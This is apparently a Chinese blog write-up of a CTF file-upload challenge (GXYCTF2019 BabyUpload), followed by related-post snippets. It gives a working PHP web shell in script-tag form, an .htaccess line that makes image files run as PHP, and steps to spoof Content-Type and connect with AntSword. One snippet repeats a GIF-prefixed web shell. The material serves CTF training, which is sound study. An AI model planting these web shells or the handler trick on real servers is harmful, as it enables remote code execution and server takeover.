BUUCTF web [GXYCTF2019]BabyUpload1 详解

最新推荐文章于 2024-03-03 12:02:10 发布
最新推荐文章于 2024-03-03 12:02:10 发布
阅读量2.2k 收藏 3
点赞数 4
文章标签: html5 css html
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/llki666/article/details/119961271
版权

打开后是这样的,

 遇到文件上传题,先传一张普通图片试试,

 提到了上传类型,用burpsuite抓包可以修改上传类型。再试试上传一句话木马:

 

 提到后缀名不能有ph,也用burp suite能改。

准备一个文本文档写一句话木马:

<script language='php'>eval($_POST['v']);</script>

推荐用这个,可以避开很多坑。然后直接把文本的后缀名txt改成jpg就行。

上传试试:

 成功!现在需要把上传成功的马解析出来,要用到这个文件:.htaccess作用:文件将别的后缀名文件内容解析为php程序。

文件内容:

SetHandler application/x-httpd-php

上传时要把文件类型改为 :image/jpeg

 

 成功!

之后用蚁剑连接读取flag:

PS: 博客主要是写给自己看的,有不对的地方请大佬指出。

llki666
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
BUUCTF Web [MRCTF2020]Ez_bypass1 & [GXYCTF2019]BabySQli1 & [GXYCTF2019]BabyUpload1
网安小趴菜
09-09 342
BUUCTF Web [MRCTF2020]Ez_bypass1 & [GXYCTF2019]BabySQli1 & [GXYCTF2019]BabyUpload1
BUUCTF_Web题目题解记录1
Altering_Ji的博客
07-11 2380
记录一下buu 刷题网站上最近做的三道web题目:[GYCTF2020]Blacklist(堆叠注入)、[网鼎杯 2020 青龙组]AreUSerialz(反序列化)、[GXYCTF2019]BabyUpload(文件上传)
[GXYCTF2019]BabyUpload1 -- 题目分析与详解
最新发布
2302_79800344的博客
03-03 1261
代码中并没有写传统的一句话木马,因为直接写一句话木马需要关闭系统防火墙。.htaccess 文件。
BUUCTFBabyUpload[GXYCTF2019]
金 帛的博客
06-11 583
BUUCTF的wp
web buuctf [GXYCTF2019]BabyUpload1
weixin_44214568的博客
03-22 806
考点:.htaccess文件, 抓包修改content-type 文件上传漏洞 1.如题: 传统上传文件题目,试了试常规的几个类型,php,phtml,php3,txt,png都不行,最后上传成功了png格式的,上传我之前写好的图片马,一句话木马内容如下: GIF89a?<script language="php">@eval($_POST[dd]);</script> 2.因为上传的是图片格式的,要将该文件变成php文件的进行上传,就需要上传.htacces
BUUCTF刷题记录[HFCTF2020]BabyUpload——涉及session反序列化
u013119911的博客
06-30 1528
点开就是源代码,直接进行代码审计
VS2019属性配置详解
10-14
主要介绍了VS2019属性配置详解,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
Web服务器之Nginx详解
07-23
资源名称:Web服务器之Nginx详解内容简介: Nginx有两个基本功能,一个是作为Web服务器(在这篇博文中重点讲解),另一个是作为反向代理(在下面的博文中详细讲解)。下面我们就来演示具体配置。首先我们要做的就是配置...
详解WEB攻击之CSRF攻击与防护
01-26
CSRF定义: 跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF ... 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。
Web Jmeter–接口测试工具详解
10-21
本文主要介绍Web Jmeter接口测试工具,这里整理了详细的资料来说明Jmeter 的使用,有需要的小伙伴可以参考下
移动开发Web框架详解
07-23
教程名称:移动开发Web框架详解课程目录:【】Android Framework框架分析【】jquery mobile 参考手册【】jquery Mobile【】jQuery Mobile中文手册【】phonegap【】手机HTML5框架 Sencha Touch 1.1.0【】跨平台移动...
BUUCTF Web1
ookami6497的博客
12-11 866
[HFCTF2020]BabyUpload
nigo134的博客
06-04 962
通过上传session文件伪造session。
BUUCTF:[GXYCTF2019]BabyUpload
末初的CSDN博客
03-24 6727
https://buuoj.cn/challenges#[GXYCTF2019]BabyUpload 有几个上传限制,一起来看一下 1、后缀名不能有ph!对于文件后缀名的限制,无法绕过这里 2、上传类型也太露骨了吧!对Content-Type的限制,修改为image/jpeg即可绕过 3、诶,别蒙我啊,这标志明显还是php啊对上传文件的内容进行了检测,不能含有<?,这里的PHP版本为:PHP/5.6.23,可以使用<script language="php">eval($_POS
Buuctf-[GXYCTF2019]BabyUpload
m0_63563528的博客
04-26 190
buuctf文件上传题
[MRCTF2020]你传你呢
Sk1y的博客
03-02 2723
[MRCTF2020]你传你????呢 目录 [MRCTF2020]你传你????呢 上传.htaccess 上传1.png 蚁剑连接 题目:buu平台 解题过程: 需要上传两个文件 .htaccess是什么 原文传送门 .htaccess文件(或者"分布式配置文件")提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来
[GXYCTF2019]BabyUpload 1
qq_43618536的博客
07-03 453
BUUCTF的[GXYCTF2019]BabyUpload 1
BUUCTF(刷题日记5)
weixin_74022830的博客
04-17 211
BUUCTF三个文件 两个参数 filename和filehash根据提示构造payload: 接下来需要找到cookie_secret 知识点:当注入长度大于2用双花括号 模板注入必须通过传输型如{{xxx}}的执行命令。探测方式很简单,给一个参数赋值{{22*22}}返回484则必然存在模板注入。 但是当我们输入error?msg={{1}}就可以得到回显,说明此处是存在SSTI注入漏洞的 2乘2试试 存在注入点构造payload: 拿到cookie_secret 对/fllllllllllllag进
[GXYCTF2019]BabyUpload1
whale_waves的博客
11-07 245
提示随便上传一个php文件这里居然有报错,这下就容易很多了尝试上传图片码虽然这里显示还是php, 但是可以绕过到这里的思路应为从返回的信息来看, 似乎识别了文件内容里的php或者是
buuctf web
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛中的一个web题目。其中可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web题目可能存在一些漏洞,比如SSRF(Server Side Request Forgery)漏洞,可以通过对内网web应用实施攻击获取webshell。因此,在buuctf web题目中,可能需要掌握SSRF漏洞的利用和对web应用的渲染函数(render函数)进行利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [【CTF】buuctf web 详解(持续更新)](https://blog.csdn.net/m0_52923241/article/details/119641325)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [【BUUCTF刷题】Web解题方法总结(一)](https://blog.csdn.net/qq_45834505/article/details/114276572)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [BUUCTFWeb真题学习整理(一)](https://blog.csdn.net/qq_41429081/article/details/98042205)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值